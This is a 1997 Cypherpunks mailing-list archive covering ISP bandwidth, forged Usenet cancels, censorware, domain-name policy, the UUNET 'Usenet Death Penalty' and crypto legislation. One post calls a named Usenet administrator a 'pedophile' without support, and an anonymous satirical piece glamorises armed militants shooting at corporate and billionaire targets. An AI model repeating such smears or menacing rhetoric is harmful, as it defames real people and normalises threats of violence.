Date: Tue, 5 Aug 1997 07:35:56 +0800
Subject: non-censorous spam control (was Re: Spam is Information?)
In-Reply-To: <199707311751.MAA21324@mailhub.amaranth.com>
Message-ID: 



"William H. Geiger III"  writes:
> Well the ISP may have 200 customer for the T1 line but they woun't have
> 200 dial up lines per T1 (at least not one that wishes to stay in business
> long). Now how many dial-up lines per T1 a ISP will have will depend on
> the traffic analysis for his customer base. There is nothing wrong with
> oversubscribing his bandwith because he knows that all his cutomers will
> not be on-line all the time using 100% of their 28.8 dial-up bandwith.
> What an ISP does have to provide for is enough bandwith to be able to
> handle the amount of dial-ups he has available. If an ISP has 200 dial-up
> lines then he best provide enough T1's to be able to support them.
> 
> The same is true for Access providers. If an access provider is servicing
> 20 T1's then he best have the bandwith to the backbone to provide the
> bandwith that he has sold. He is collecting the $$$ to provide the service
> he is obligated to provide it.

Unfortunately a lot of ISPs - both local and national - have done exactly
that - oversubscribed to the point of defrauding their customers.

A friend of mine subscribed to his local ISP - the usual deal, $19.95/month
for unlimited use.  One day he gets a phone call from the ISP's owner asking
(in a rather irate manner) if he's running 'bots or "keepalive" or why he's
spending so much time tying up the modem.  The friend replied that he's doing 
neither of those things, but he does spend 5 or 6 hours every day browsing
the Web and reading newsgroups.  The ISP owner wasn't happy. Soon the friend
began to experience loss of carrier whenever he was connected via PPP during
the evening. He called up the ISP and asked if he's just dropping his carrier.
The ISP would neither confirm nor deny, but repeated that the friend stays
online "too much". At this point the friend told him to close the account
and moved to a different ISP.

We used to have a shell account at a local ISP who had non-stop problems with
their disks, their news server, their modem pool (ringno-answer, can't busy
out the brokenmodems....) We left them last year; I understand that now their
system has completely broken down and they're blaming it on some mythical
"spammers" rather than their incompetence.

> 
> Now if an access provider does detailed analysis of his traffic and
> determins that he needs only 4 T3's to provide service for 20 T1's and
> therefore reduces his costs that's fine. But if one of his T1 customers
> traffic increases he is obligated to add more bandwith on his end to
> handle it.
> 
> This is what the whole bandwith issue comes down to. ISP & Access
> providers atempting to maximise profits for given resources. This doesn't
> nullify their obligations to their customers. If they sell T1 bandwith
> 24/7 to their customers then they are required to provide that service if
> their customers demand it. The current movement to blaim users for using
> the resources that they have been sold is wrong. It is no different that
> if a car dealer sells you a 100,000 mile warrenty on a car then renigs on
> the contract because he really didn't expect you to drive 100,000 miles
> with it.

Ah but they have a great excuse - the mythical "spammers".  We really meant 
to service a 300-modem pool through this T1, but the spammers stopped us from
doing that.  Reminds me how the Soviets in 1930s blamed all possible problems
(and there were lots of real problems) on "saboteurs", and how the Nazis in
the same time frame blamed all of their (real) problems on Jews.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Mon Aug  4 16:38:26 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 5 Aug 1997 07:38:26 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: 
Message-ID: <59kXae1w165w@bwalk.dm.com>



? the Platypus {aka David Formosa}  writes:

> > You're not very bright are you David?
> 
> Haveing trubble working out what this line is,  as a flame it is limp
> wristed, as a rebuttle it is pathtic.

Our frustration with the Cabal supporters is understandable.

> > >There is little proof that this is the case.  Even the netscum case could
> > >have been considered spam.
> > 
> > What the fuck is "the netscum case"?
> 
> Boursy or Grubour (I've forgotten wich one) keeped posting an add for
> Chris Lewis' netscum post.  Chris Lewis desidered that thay where
> substatuly identical and canceled them.

Pedophile Chris Lewis is a content censor.  There are dozens of other examples.
For example, see the Net.Scum pages for Nat Makarevitch or Michael Martinez,
both of whom arbitrarily declare some article "spam" and forge cancels dfor it.

> > >Ok so if a mailing list gateway @bwalk.dm.com pumps thousands of broken
> > >posts into usenet you don't wish them to be removed from usenet?
> > 
> > The motherfucker can remove them himself, send him a note.
> 
> Since Dr Vulis is the newsadmin of that site, the question is quite valid.

I would not issue cancels in either case.  I would like to be able to tell
the rest of Usenet that these articles are not worth reading, and that I
have sifficient authority to say so (by having my e-mail address in the
from: field or being the local admin).  I wouldn't want to delete them from
anyone's spool, though.

> 
> > But after 
> > they've already hit our servers and we've already read them it doesn't 
> > make much of a difference now does it?
> 
> Frees up diskspace + reducers propragtion.  May be a good thing.

A spew spreads to almost all the servers there are in minutes. Cancels for
a spew waste more bandwidth and cpu time than ignoring it.

> 
> > We've got to receive repeated 
> > blasts of forged cancels ten times the number of the offending posts?
> 
> Ergh?  There is only one cancel per post.

Were you around when Ausralia was knocked off the net by the cancels for the
Cantor and Siegel "spam"?  Most of the forgers didn't follow the "$alz"
convention (giving the forged cancel the message-id "cancel.".

> 
> > >Nor if I post a message with your name and email, saying "Chris Lewis the
> > >best thing that happened to usenet and I wish to have his baby."
> > 
> > A simple "I didn't write that" shall suffice.
> 
> Realy how about "Post to me your corefile for free porn."?

How about me posting under my own name, "E-mail your core file to Platypus
for some free porn"?

How about me posting under my own name or via an anonymous remailer, "Platypus
is a spammer - complain to his ISP"?

Would you be justified in forgin cancels for these?

How about if someone posted your credit card numbers to Usenet?
Would you be justified in forging cancel for that?
> 
> > And when your content to mail lists is a 
> > fifth the size of your 16-line .sig, you're doing something wrong.
> 
> My sig is four lines long.  I know there is also the overhead of the pgp
> signing but atleast its not smime.

I don't have an issue with anyone's .sig, especially Dr. Fomin's, but
Net.Scum like Chris Lewis might use this as an excuse to declare your
writings "spam".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From hua at chromatic.com  Mon Aug  4 16:53:59 1997
From: hua at chromatic.com (Ernest Hua)
Date: Tue, 5 Aug 1997 07:53:59 +0800
Subject: Clinton's threat of line-item veto affect crypto bill?
Message-ID: <199708042336.QAA00471@ohio.chromatic.com>



Does anyone have any idea whether Clinton's threat of using the
line-item veto against portions of the big spending bill could
be leverage against some pro-SAFE legislators?

Ern






From declan at well.com  Mon Aug  4 17:46:53 1997
From: declan at well.com (Declan McCullagh)
Date: Tue, 5 Aug 1997 08:46:53 +0800
Subject: "Censor's Sensibility" on censorware & ratings, from Time
Message-ID: 




---------

http://pathfinder.com/time/magazine/1997/dom/970811/business.censors_sensi.html

TIME MAGAZINE

AUGUST 11, 1997
VOL. 150 NO. 6
BUSINESS
   
CENSOR'S SENSIBILITY 
Are web filters valuable watchdogs or just new online thought police?
  
BY MICHAEL KRANTZ 
   
   Seeking to protect fellow citizens from depravities ranging from TV
   violence to rap lyrics, from Uncle Tom's Cabin to Howard Stern, some
   Americans have always had a hard time restraining themselves from
   trying to circumvent the First Amendment. And the World Wide Web, with
   its infinite plenitude of pro-Satan home pages and SEXY NUDE BABES!
   sites, has more, um, free speech in need of protection than any medium
   in history. As lurid tales of online obscenity seep into America's
   consciousness, a variety of Internet sentinels have volunteered their
   services.
   
   Or was that Internet censors? What one group claims as guardianship of
   public morality strikes another as unconscionable, not to mention
   unconstitutional, interference. In June the Supreme Court slapped down
   the Communications Decency Act (CDA), which prohibited the posting of
   "indecent" material over the Net. This decision in turn has created a
   hot market for products that derisive Net-heads call
   "censorware"--such software filters as CyberPatrol, NetNanny and
   SurfWatch ($29.95 to $39.95) that offer to help nervous parents keep
   inappropriate material from prying but underage eyes.
   
   Just what is inappropriate is a messy issue, as citizens of Loudoun
   County, Va., a conservative enclave northwest of Washington, can
   attest. Last month, after six public hearings and over the objections
   of library staff, the county library board adopted the region's most
   restrictive Internet-access policy. Henceforth, the library will arm
   its computers with filters to censor obscene sites--the definition of
   obscenity, of course, being largely up to whichever filter Loudoun
   County ends up deciding to buy. Adults who want to cruise the Net sans
   filter will have to ask the librarian to call off the watchdogs;
   children under 17 will be able to do so only if accompanied by an
   adult. "The issue is whether pornography will get into the library,"
   says board president John Nicholas. "Our task is to protect our
   children."
   
   A more politically fireproof sentence has yet to be conceived by
   mortal man. On the surface the policy seems reasonable, given the
   prevalence of offensive sites and the ease with which even a novice
   Web surfer can find them (though most porn sites these days can't be
   accessed without a credit card). But free-speech advocates call
   censorware a cure worse than the disease. Filtering programs block Web
   pages in one of two ways. The more primitive method is to search for
   key words in the pages' titles, a system with all the subtlety of a
   Gatling gun. America Online, for instance, once banned the word breast
   from some areas of its service, which outraged breast-cancer sufferers
   locked out of their bulletin boards. And SurfWatch legendarily banned
   sites featuring the word couples, only to discover that that word
   appears on the White House's official site.
   
   A better method is to study individual sites--yes, that means hundreds
   of thousands of them, one at a time--and then place them on yes or no
   lists that can be updated as new pages pop up in the Web's endless
   sprawl. A program called CyberPatrol identifies 12 categories of
   troublesome material (violence, profanity, sexual acts and so on) that
   parents can block at their discretion. The software can also be
   adjusted for different age groups. "My six-year-old son doesn't need
   to know how to put on a condom," says CyberPatrol spokeswoman Sydney
   Rubin. "But I'll sure want him to know when he's 13."
   
   Opponents say the filter companies' banned lists can also reflect
   ideological biases. CyberSitter, the most aggressively conservative
   filtering program, is infamous for blocking access to the National
   Organization for Women's Website as well as entire Internet providers
   like Echo, New York City's oldest online community. Gay-themed
   sites--big surprise--suffer mightily. CyberPatrol blocks the Queer
   Resources Directory; CyberSitter bans the alt.politics.homosexual
   newsgroup; SurfWatch blocks ClariNet's AP and Reuters articles about
   AIDS and HIV.
   
   If conservative parents want software that will censor any Website
   that the Rev. Jerry Falwell wouldn't say amen to, that's their
   privilege. But free-speech proponents say customers looking for
   ideology-free screening might not be aware of how much they're
   missing. Censorware produces unpredictable and often unwanted results
   (see box), and most filterers consider their blacklists trade secrets.
   This puts Loudoun County in the position of letting private firms pass
   judgment on the contents of a medium that's supposed to offer easy
   access to all--a notion that's especially dubious in the case of the
   "free public library," Internet provider of last resort for those who
   can't afford a computer. "We serve the information needs of the whole
   community," says Judith Krug, director of the American Library
   Association's Office for Intellectual Freedom. "Identifying one
   standard for everyone violates the rights of everybody else."
   
   Such First Amendment echoes make even conservative Congressmen
   nervous. "I endorse the notion of filtering devices at home," says Bob
   Goodlatte, a pro-CDA Republican Representative from Virginia, "but
   there's certainly a legitimate debate as to how to do it in libraries
   without introducing a major form of censorship."
   
   There are, however, minor forms, including asking the Websites to rate
   their content "voluntarily." Chris Hansen, senior staff counsel for
   the American Civil Liberties Union, is particularly disturbed by the
   growing political support for self-censorship. "Rating systems may
   work, however badly, in TV or movies, where there are relatively few
   programs and armies of lawyers," he says. "But with E-mail, chat rooms
   and newsgroups, the sheer volume is overwhelming."
   
   Nonetheless, self-censorship is starting to look like the wave--or at
   least one very big wave--of the future. Microsoft's Internet Explorer
   Web browser already includes a ratings program called RSACi. It has
   emerged as the leading Net-rating system that allows Web proprietors
   to rate their own sites instead of letting NetNanny and SurfWatch
   employees pass judgment for them. And rival Netscape, bowing to
   pressure from the White House at last month's censorware summit (Bill
   Clinton, predictably, loves ostensibly family-friendly software
   filters), has agreed to use rating systems in the next version of its
   browser. Even news organizations, whose free-speech obsession borders
   on the fanatic, are rating themselves (see THE NETLY NEWS). The
   Webmasters' private initiative, though, may not cool legislative ardor
   for rewriting the cda. Neither filtering software nor self-rating is
   sufficient to clean up the Net, in the view of Senator Dan Coats of
   Indiana. Filters are "a good first step," he says, but "it's a tax on
   the family--the innocent family." Of course, the same could be said
   for clear-cutting the Web's forests of unfettered speech.
   
   --Reported by Declan McCullagh and Bruce van Voorst/Washington
   
     _________________________________________________________________
                                      
   BUSTED!
   Some surprising sites get trapped in the filters
   
   (www.heritage.org/heritage/) The Heritage Foundation
   (www.mit.edu/activities/safe) M.I.T. free-speech society
   (news:clari.tw.health.aids) Reuters articles about AIDS
   (www.odci.gov/) U.S. Central Intelligence Agency
   (www.cs.cmu.edu/~spok/banned-books.html) Banned-books archive
   (www.now.org/) National Organization for Women
     _________________________________________________________________
                                      
Related articles:

http://pathfinder.com/time/magazine/1997/dom/970811/business.the_pres_muzl.html







From frogfarm at yakko.cs.wmich.edu  Mon Aug  4 18:19:22 1997
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Tue, 5 Aug 1997 09:19:22 +0800
Subject: cta983.htm
Message-ID: <199708050109.VAA13348@yakko.cs.wmich.edu>




   [1]Score big with your contacts. Click here for ACT!3.0
   
  U.S. government stepping in to sort out Net domain names
  
   WASHINGTON - Concerns about the future of how Internet domain names
   will be managed got an airing during a two-day forum last week. But
   how those concerns may get addressed remains unresolved.
   
   The domain name issue has drawn a lot of attention lately. The company
   that has a virtual monopoly on popular names, Network Solutions Inc.
   (NSI), has been notified that it will not have its contract renewed in
   April 1998. Many say that will bring much needed competition.
   
   Recently, the Clinton administration has gotten involved in the issue
   on various levels. The Justice Department is investigating NSI's role
   as a primary domain name registrar.
   
   Beyond that, the Departments of Commerce and State are looking into a
   plan, issued three months ago by the Internet International Ad Hoc
   Committee (IAHC), that would increase the amount of domain names
   (designations such as .com and .org) used on the Internet. The plan
   also expands the worldwide management of those names so that up to 28
   new registrars may be added.
   
   The administration's involvement came after many businesses complained
   about the proposed plan's lack of protection for trademark and
   intellectual property rights.
   
   A two-day forum to address such concerns was held here Wednesday and
   Thursday. Sponsored by the Information Technology Association of
   America and other Internet groups, it was attended by representatives
   of the Clinton administration, businesses and advocates. "We have to
   keep the Internet community talking," says ITAA president Harris
   Miller.
   
   Domain names are essentially addresses for the Internet. Companies,
   agencies or groups apply for an individual address within such domains
   as .com, .gov, or .org. As use of the Internet has grown, companies
   have put increasing importance on obtaining and protecting domain
   names related to their companies.
   
   When entities apply to NSI, it charges $100 to register new addresses
   for two years and $50 annually to renew them. NSI then finds an
   Internet number, just like a telephone number, to correspond with the
   domain address.
   
   Many have complained about NSI's inability to quickly provide domain
   registrations. In its proposed stock offering, NSI says it is
   cooperating with the Justice Department inquiry. And at the forum, NSI
   CEO Gabe Battista said that sharing management of .com, .net and .org
   domains was "on the table."
   
   The U.S. government has nurtured the Internet to its present strapping
   status from its birth in 1969 as the Defense Department's Advanced
   Research Projects Agency network. "We're very anxious to support its
   transition to full-fledged adulthood," says Commerce Department
   spokesperson Becky Burr. "But we don't just let our children grow up
   and do whatever they want."
   
   The Internet community usually seeks to avoid government intervention,
   but so far, U.S. government's actions have been met with approval.
   Among complaints about the international plan is that it did not have
   adequate participation by Internet service providers or groups
   representing individual citizens, plus it gives too much power to the
   Geneva-based International Telecommunication Union.
   
   "Our customers are not well-served by (the plan's) rapid resolution,"
   says William Schrader, president of PSINet, a large commercial
   Internet service provider. "The government has held back on purpose.
   But there is a time governments can assist, and this is one of those
   times."
   
   The State Department has asked for more information on the Geneva
   agency's role in the management of proposed new domains, among them
   .firm, .rec and .web. The Commerce Department takes public comments
   until Aug. 18.
   
   The Ad-Hoc Committee continues its plan and is taking registrar
   applications. But, says committee member Dave Crocker, an Internet
   e-mail pioneer, "We'll all keep talking."
   
   By Mike Snider, USA TODAY
     _________________________________________________________________
   
     * [2]Go to High-tech index
     * [3]Go to Life Front
     * [4]Go to Lifeline
     * [5]Go to Money Front
     * [6]Go to Moneyline
     * [7]Go to News Front
     * [8]Go to Nationline
     _________________________________________________________________
   
     * [9]Go to Web Traveler
       
   [10][ISMAP]
08/04/97 - 09:58 AM ET - Click reload often for latest version

References

   1. http://www.usatoday.com/cgi-bin/redir?SpaceID=104&AdID=913&URL=http://www.symantec.com/promos/act06.html
   2. http://www.usatoday.com/life/cyber/tech/ct000.htm
   3. http://www.usatoday.com/life/lfront.htm
   4. http://www.usatoday.com/life/digest/ld1.htm
   5. http://www.usatoday.com/money/mfront.htm
   6. http://www.usatoday.com/money/digest/md1.htm
   7. http://www.usatoday.com/news/nfront.htm
   8. http://www.usatoday.com/news/digest/nd1.htm
   9. http://www.usatoday.com/life/cyber/cyber1.htm
  10. http://www.usatoday.com/maps/botrib.map






From ravage at ssz.com  Mon Aug  4 19:33:18 1997
From: ravage at ssz.com (Jim Choate)
Date: Tue, 5 Aug 1997 10:33:18 +0800
Subject: http:--www.cnn.com-TECH-9708-04-internet.spam.reut-
Message-ID: <199708050220.VAA01661@einstein.ssz.com>



    CNN logo 
   Navigation 
   
   Infoseek/Big Yellow 
   
   
   Pathfinder/Warner Bros 
   
   
   
   
   Tech banner IBM Reinventing Education 
   
     rule
     
                    SPAMMING LEADS TO UUNET 'DEATH PENALTY'
                                       
      Spam graphic August 4, 1997
     Web posted at: 9:34 p.m. EDT (0134 GMT)
     
     SAN FRANCISCO (Reuter) -- A loose coalition of system administrators
     Friday began issuing a "Usenet Death Penalty" against UUNET, a major
     Internet service provider, for its alleged failure to curb "spam"
     emanating from its dialup accounts.
     
     The penalty took effect 5 p.m. (PDT) Friday, and according to a
     release from the coalition, "all traffic coming from these sources
     is to be canceled until further notice."
     
     The penalty entails the use of a program called a cancelbot that
     travels from site to site, looking for newsgroup messages that
     originate from a particular person or ISP. When it finds one of the
     messages, it issues a cancel order, which effectively erases the
     message.
     
     Spamming is the bulk delivery of unwanted electronic messages via
     e-mail or newsgroups.
     
     The action marks the first time a large-scale ISP has been the
     target of a cancelbot. The penalty's purpose, said Dennis
     McClain-Furmansky, is to "mobilize the user base and get them to
     insist on their ISP to give them a clean feed. Right now they are
     paying $20 a month for trash."
     
     McClain-Furmansky, speaking on behalf of the Usenet death penalty
     issuers, explains that, unlike other ISPs such as EarthLink and Bell
     Atlantic, UUNET has done little or nothing to curb spammers using
     its service. "The few responses they've made to our complaints have
     been excuses," he said.
     
     After Bell Atlantic was informed by site administrators several
     weeks ago that it had been targeted for the Usenet death penalty,
     the service took immediate action to halt spam, McClain-Furmansky
     said. "We told them what was being planned, and they are making a
     clear effort."
     
     McClain-Furmansky said that the action was drastic, but it was a
     last resort to close off a flood of spam that was "knocking servers
     offline." On Friday, one of the administrators involved said his
     system processed 1 million messages for the first time ever. Forty
     percent of that was spam, 40 percent cancel messages, 20 percent
     legitimate traffic." About half the cancel messages issued are for
     spam originating from UUNET dialups, said McClain-Furmansky.
     
     "In my opinion, this is by far the worst censorship action the Net
     has seen to date," said Dave Hayes, who represents a group called
     the Freedom Knights, dedicated to "true free speech" on Usenet.
     
     Hayes said those pushing the death decree should be "summarily
     condemned by all those who are in support of free speech, which
     unfortunately includes unsolicited advertising."
     
     Brian Moore, a system administrator in Britain who oversees the
     Usenet feed for his site, said he is not surprised that the action
     was taken against UUNET. "Amongst the 50-some complaints I have sent
     them in the past week, I have received nothing but form letters
     back. The spamming customers continue spamming and there is no
     indication UUNET has acted in any way at all."
     
     Moore said he has canceled hundreds of porn spams appearing in
     alt.sexual.abuse.recovery. "Quite frankly, UUNET is irresponsible in
     their inability to control their own customers," he said.
     
     UUNET declined comment Friday.
     
     Copyright 1997 Reuters Limited. All rights reserved. 
     rule
     
  Related sites:
  
     Note: Pages will open in a new browser window
     * UUNET Global Homepage
     * The Anti-Spam Project
     * Internet Spam Haiku Contest
     * Internet Spam Control Center
       
     
     
     External sites are not endorsed by CNN Interactive.  Search for
     related CNN stories:
     ________________________________________   ______ [Help]
     Tip: You can restrict your search to the title of a document.
     Infoseek grfk
     
     Example: title:New Year's Resolutions
      rule
     
     Watch these shows on CNN for more sci-tech stories:
     
     CNN Computer Connection | Future Watch | Science & Technology Week
     rule Message Boards 
     
  Sound off on our message boards
  
     Tell us what you think!
     
     You said it... [INLINE] IBM Reinventing Education rule
     
   
   To the top 
   
   � 1997 Cable News Network, Inc.
   All Rights Reserved.
   
        Terms under which this service is provided to you.






From nobody at REPLAY.COM  Mon Aug  4 21:40:15 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Tue, 5 Aug 1997 12:40:15 +0800
Subject: Not-News Gorilla NutWork Rocket-Launched
Message-ID: <199708050419.GAA20335@basement.replay.com>





[Not-News NetWork-- Mohave Desert] Aug 4/97



 WHAT DOES A FIVE HUNDRED POUND GORILLA READ AT THE BREAKFAST TABLE?

 -------------------------------------------------------------------

                                                               - sog

The "Not-News Gorilla NutWork" was rocket-launched in the Mohave Desert

early yesterday morning  by a rag-tag bunch of paramilitarist computer 
gurus who unveiled an InterNet Bill of Bytes that included the words, 

"MicroSoft shall make no laws..."



Angered by a self-appointed council of computer industry magnates who

have announced their intention to seize fascist control of the quickly

burdgeoning Information Highway by controlling the definition of all

information, the rebels set up a shooting range which contained a wide

variety of targets ranging from copies of the Wall Street Journal to

life-sized cardboard cut-outs of a hooded figure referred to only as,

"a billionaire to be named later."



A Che Guerva look-alike named Lefty (a nickname changed from "Lucky"
after a laboratory accident took three of the fingers on his right
hand) spoke openly about the group's loose-knit plans to impose their
own ratings system on corporations who have "taken it upon themselves
to decide what is news and what is not--what is information and what
is obscenity." 
  "We have decided on two classes of ratings." explained a tassle-
haired young woman as she slid shells into a Winchester Defender
sitting on her lap. "On..." she said, lifting the shotgun with one
hand, then liberating the hooded head from a nearby cardboard cut-out,
before turning back to say, with a Cheshire grin, "...and _off_."

The wide array of luxury automobiles and high-end computer gear on
display at the gathering lent credence to the claim of a quiet older
man whose only comment during my presence was, "The people here
probably have a combined access to more soft targets than the NSA."
He turned to punctuate his statement, as many others did that day,
with a volley of fire that penetrated targets carrying the corporate
logos of a variety of big-name players in the computer industry.

Surprisingly, the conversation consisted almost totally of issues
surrounding privacy, self-determination and freedom from censorship,
with hardly a word being spoken about potential plans of action of
individuals or the group. As the quiet man's equally quiet wife
spoke in what seemed to be a deathly whisper, telling me, "Everyone
here knows what they have to do.", a man with a crude, homemade
rocket-launcher sent a flaming projectile into the side of a small
propane tank several hundred feet away, as if punctuating the last
and most meaningful statement of the day.
  After quietly dispersing a few minutes later, the group packed up
their weapons and climbed into their vehicles without a word between
them, each seemingly going their own separate ways.

  I stayed on after the last of the others had left, reflecting on the
fact that I had arrived at this gathering by virtue of a late-night
phone call to my unlisted number, and found that I knew none of the
participants in the activities.
  I had the strangest feeling that the others there had arrived by the
same anonymous process as I had, and I wondered if they were equally
mystified as to who had arranged this impromptu assembly of apparent
strangers joined in a common cause. Immediately, one of the pickup
trucks driving away backfired, and I thought of synchronicity, knowing
that the truck would backfire once again, which it immediately did, 
before disappearing quietly out of sight.

  Climbing into my own vehicle, I took a last look at the site, which
had been cleaned and left exactly the way it was when I had first
arrived on the scene. I experienced a moment of deja-vue, as if I had
just arrived and none of what I had experienced that day had truly
transpired.
  Somewhere in the distance, a vehicle backfired...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer - I am not a reporter, I am not a paramilitarist, and I am
not a computer expert. I have no idea what I was doing there and I am
not even certain that I should be speaking about the event...but I am.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From jito at eccosys.com  Mon Aug  4 21:51:16 1997
From: jito at eccosys.com (Joichi Ito)
Date: Tue, 5 Aug 1997 12:51:16 +0800
Subject: Tim 1 - Joichi 0 - DreamMonger NULL / Re: Joichi gives up (fwd)
Message-ID: <199708050445.NAA03179@eccosys.com>




I said:
>>but I'll stop now before I get bashed again.

At 07:44 97/08/04 -0500, Jim Choate wrote:
> If all it takes to take over the citizens of Japan is to bash them a little
> then you folks are Doomed. Perhaps you have spent one too many days
> hammering nails that stick up...

I meant get bashed here... and I don't hammer nails. Hammers nail me.
And it seems like there are US hammers too. "To a hammer everything
looks like a nail."

- Joi

--
Finger jito at nsm.eccosys.com or jito at garage.co.jp for PGP Key
Fingerprint for RSA PGP Key ID 0x0EE23A2D
0D3A 7AAA 3DA8 E7B3  3AF1 C6FA B7ED D834
Fingerprint for DSS/Diffie-Hellman PGP Key ID 0x2D9461F1
58F3 CA9A EFB8 EB9D DF18  6B16 E48D AF2A 2D94 61F1
Home Page: http://domino.garage.co.jp/jito/joihome.nsf
To subscribe to my personal mailing list send mailto:friends-subscribe at ito.com




From geeman at best.com  Mon Aug  4 22:14:49 1997
From: geeman at best.com (geeman at best.com)
Date: Tue, 5 Aug 1997 13:14:49 +0800
Subject: Clinton's threat of line-item veto affect crypto bill?
Message-ID: <3.0.32.19691231160000.0073303c@best.com>



shit - the SJ Merc. reported he'll just veto the legislation, plain and
simple.

At 04:36 PM 8/4/97 -0700, Ernest Hua wrote:
>
>Does anyone have any idea whether Clinton's threat of using the
>line-item veto against portions of the big spending bill could
>be leverage against some pro-SAFE legislators?
>
>Ern
>
>
>






From ravage at ssz.com  Mon Aug  4 22:16:42 1997
From: ravage at ssz.com (Jim Choate)
Date: Tue, 5 Aug 1997 13:16:42 +0800
Subject: Tim 1 - Joichi 0 - DreamMonger NULL / Re: Joichi gives up (fwd)
Message-ID: <199708050506.AAA02022@einstein.ssz.com>



Forwarded message:

> Date: Tue, 05 Aug 1997 13:25:48 +0900
> From: Joichi Ito 
> Subject: Re: Tim 1 - Joichi 0 - DreamMonger NULL / Re: Joichi gives up
>   (fwd)

> At 07:44 97/08/04 -0500, Jim Choate wrote:
> > If all it takes to take over the citizens of Japan is to bash them a little
> > then you folks are Doomed. Perhaps you have spent one too many days
> > hammering nails that stick up...
> 
> I meant get bashed here... and I don't hammer nails. Hammers nail me.
> And it seems like there are US hammers too. "To a hammer everything
> looks like a nail."

Which puts just about everything at an advantage over the hammer. At least
its actions are consistent and predictable.

A hammer can't hurt that which it can't hit. (hint: nails don't move)

Ta ta...

                                                    Jim Choate
                                                    ravage at ssz.com






From stewarts at ix.netcom.com  Mon Aug  4 23:07:10 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 5 Aug 1997 14:07:10 +0800
Subject: [ANNOUNCE] Another Bay Area August Cypherpunks Meeting - Mountain View
In-Reply-To: <3.0.2.32.19970802120325.006985f4@netcom10.netcom.com>
Message-ID: <3.0.2.32.19970804173808.00777da0@popd.ix.netcom.com>



At 12:03 PM 8/2/97 -0700, Lucky Green wrote:
>This month's SF Bay Area Cypherpunks meeting will take place at a new
>location. Please pay close attention to the directions.
>Saturday, August 9, 1997 at 1:00 PM PDT. [22:00 local]
>The Workshop tent, HIP'97 Campground, Almere, The Netherlands.

For those who aren't that HIP or Beyond HOPE, or are otherwise still in 
Western North America, Another SF Bay Area Cypherpunks Meeting will take 
place in Mountain View, at Printer's Ink on Castro Street.
Besides the usual Cypherpunks topics, the program will include the
	Small Brewers' Festival http://www.smallbrewersfest.com/
which will be taking place that day in Mountain View.
(An extremely serious program is anticipated, potentially followed by
The Reptiles and Jerry's Kids in Redwood City that night.)

If anybody brings a Metricom modem, we can try to connect with the
Netherlands meeting by PGPfone or the HIP'97 VRML server;
please let me know if you plan to bring one so we can conspire
about connectivity.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From stewarts at ix.netcom.com  Mon Aug  4 23:58:11 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 5 Aug 1997 14:58:11 +0800
Subject: Ponzi Schemes (was Re: non-censorous spam control)
In-Reply-To: <199708042057.WAA23756@basement.replay.com>
Message-ID: <3.0.2.32.19970804232822.00769af8@popd.ix.netcom.com>



>>still running a pyramid scheme: he accepts "voluntary donations"
>>from an investor, in return for a "voluntary donation" at a later
>>date whose amount and time are not guaranteed and depend on
>>the "donations" collected from others. The Russian government
>>does not shut down Mavrodi's latest operation so far, claiming
>>it's not "fraud" since he doesn't misrepresent the source of
>>his returns nor the risks involved. Reportedly so far he's

A cheerful Ponzi scheme from the late 70s was the
Church Of Hakeem, in Oakland.  Hakeem Rasheed preached a lot about
Prosperity!, and how it could be Yours!  if you just had Faith!
It cost about $300 to be a priest, and once you were a priest,
you could lend the church money and get it back at some
outrageously high interest rate, like 100% per month.
Believers were making scads of money, just hand over fist.
Everybody was shocked when the church was robbed of several
hundred thousand dollars one night, and shortly thereafter
Hakeem was so depressed he skipped town, the poor guy.
	(huh huh, huh huh, depressed, huh huh)

On the other hand, the Social Security Trust Fund is just fine, thanks.

Fortunately, while encryption isn't getting blamed for Ponzi schemes yet,
anonymity is getting some of the fallout from spammers who are 
running them from behind forged mail headers, so we could still get hosed.



#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From geeman at best.com  Tue Aug  5 00:08:51 1997
From: geeman at best.com (geeman at best.com)
Date: Tue, 5 Aug 1997 15:08:51 +0800
Subject: Crypto Legislation Page - docs and links
Message-ID: <3.0.32.19970804235303.00683bbc@best.com>



I've collected all the stuff I've had laying around since Feb. or so
regarding the Senate and House Bills on crypto, including comment papers
and links thereto, Congressional Record dumps, and so forth.  I intend to
keep this up to date as things 'move forward' --- Thanks to these lists for
a lot of pointers to valuable information; my hope is that my page provides
a central location for monitoring, as much of the information has been
scattered about among the .org's who are watching, JYA, etc. etc.

Any comments appreciated, thx.

see www.best.com/~geeman







From axlotl at rigel.cyberpass.net  Tue Aug  5 01:29:53 1997
From: axlotl at rigel.cyberpass.net (axlotl)
Date: Tue, 5 Aug 1997 16:29:53 +0800
Subject: European Union Bank
Message-ID: 







---
axlotl at cyberpass.net






From grant at sparks.to  Tue Aug  5 02:01:02 1997
From: grant at sparks.to (Grant Sparks)
Date: Tue, 5 Aug 1997 17:01:02 +0800
Subject: Oz
Message-ID: <01BCA1CF.B3117820.grant@sparks.to>



Are there any Australian cypherpunks ?  Contact me & we'll get together a local 
chapter,

Grant Sparks
grant at sparks.to
Finger me for PGP and WWW information.







From dformosa at st.nepean.uws.edu.au  Tue Aug  5 03:42:31 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Tue, 5 Aug 1997 18:42:31 +0800
Subject: Eternity Content Suggestions
In-Reply-To: 
